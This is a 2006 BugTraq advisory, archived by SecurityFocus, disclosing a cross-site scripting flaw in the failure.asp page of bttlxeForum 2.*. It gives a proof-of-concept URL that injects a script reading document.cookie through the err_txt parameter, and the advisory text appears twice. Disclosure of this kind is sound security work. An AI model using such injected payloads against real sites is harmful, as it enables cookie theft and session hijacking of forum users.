BugTraq
Back to list
|
Post reply
bttlxeForum 2.* XSS Vulnerability
Feb 26 2006 06:05PM
stormhacker hotmail com
--------------------Summary----------------
Software: bttlxeForum
Sowtware's Web Site: http://www.bttlxe.com/
Versions: 2.*
Type: Cross-Site Scripting
Class: Remote
Exploit: Available
Solution: Not Available
Discovered by: runvirus
(worlddefacers.de securitycentra.com)
-----------------Description---------------
Vulnerable Script: failure.asp
--------------Exploit----------------------
http://www.example.comforums/failure.asp?err_txt=<script>alert(document.
cookie);</script>
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Discovered by: runvirus
(worlddefacers.de securitycentra.com)
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Software: bttlxeForum
Sowtware's Web Site: http://www.bttlxe.com/
Versions: 2.*
Type: Cross-Site Scripting
Class: Remote
Exploit: Available
Solution: Not Available
Discovered by: runvirus
(worlddefacers.de securitycentra.com)
-----------------Description---------------
Vulnerable Script: failure.asp
--------------Exploit----------------------
http://www.example.comforums/failure.asp?err_txt=<script>alert(document.
cookie);</script>
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Discovered by: runvirus
(worlddefacers.de securitycentra.com)
[ reply ]